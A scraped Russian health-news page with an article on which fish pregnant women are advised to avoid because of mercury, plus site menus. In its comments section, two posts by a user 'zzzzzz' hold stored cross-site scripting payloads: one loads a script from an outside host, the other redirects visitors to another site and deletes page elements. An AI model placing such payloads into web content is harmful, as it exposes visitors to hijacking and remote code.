Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рыбка моя – я твой глазик...  >>  Рыбка моя – я твой глазик! Какую рыбку нельзя есть беременным!
 
Обратная связь
 

Рыбка моя – я твой глазик! Какую рыбку нельзя есть беременным!

Размер шрифта
25 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Предпочтения в еде беременной женщины – загадка для окружающих. Однако не стоит забывать и о здоровом питании. Согласно статье в журнале ConsumerReports, беременные должны избегать употребления в пищу тунца. Причина этому – высокое содержание в нем ртути.

Рыбка моя – я твой глазик! Какую рыбку нельзя есть беременным!

«Это касается в первую очередь консервированного тунца, который является вторым по распространенности после креветок морепродуктом, употребляемым в пищу. Мы советуем беременным женщинам не есть блюда из этой рыбы», – заявляет Джин Халлоран, директор движения по контролю за продуктами питания.

Именно беременные женщины и дети наиболее подвержены вредному влиянию ртути, содержащейся в морепродуктах. Однако каждый человек может оказаться в группе риска, если употребляет слишком много морепродуктов с высоким содержанием этого опасного вещества. По мнению ученых, взрослые, которые едят более 680 грамм морепродуктов в неделю, также должны избегать продуктов с высоким содержанием ртути, к примеру, суши с тунцом. С другой стороны, существует более двадцати видов морепродуктов, которые все люди, включая беременных женщин и детей, могут есть несколько раз в неделю, не опасаясь вредного влияния ртути.

Несмотря на то, что рыба и другие морепродукты содержат омега-3 жирные кислоты и другие полезные вещества, многие люди всерьез обеспокоены тем, что уровень ртути в таких продуктах очень высок. Ртуть, в свою очередь, может стать причиной повреждения головного мозга и других отделов нервной системы человека.

В статье приводятся данные об уровне ртути в различных морепродуктах. Среди них есть и те, которые можно есть несколько раз в неделю без риска опасного повышения уровня ртути в организме. Морепродукты с самым низким содержанием ртути – это морской лосось, гребешки, креветки и рыба тилапия. Также безопасны для употребления крабовое мясо, сом, форель, камбала и палтус.

Согласно новым официальным рекомендациям, женщинам детородного возраста и детям не стоит употреблять в пищу четыре вида морепродуктов, в которых уровень ртути наиболее высок. К ним относится мясо рыбы-меч, акулы, королевская макрель и кафельник. Также в этот список вскоре могут быть включены марлин и атлантический большеголов.

Несмотря ни на что, рыба и морепродукты – полезная и вкусная часть рациона. Однако стоит следить за количеством съеденных креветок и тунца, а также обязательно пробовать новые, более безопасные и к тому же экзотичные блюда из морепродуктов.

Вооружитесь знаниями на страницах нашего специального проекта «Ребенок будет», чтобы стать мамой здорового малыша.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:28

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
ВИЧ и беременность. Как защититься?   Толстейте на здоровье! Сколько лишних килограммов нужно беременным?!   Сифилис и беременность. Как защититься?   Хламидия и беременность. Как защититься?  
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Можно ли беременеть после 40?
Есть ли секс во время беременности?

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.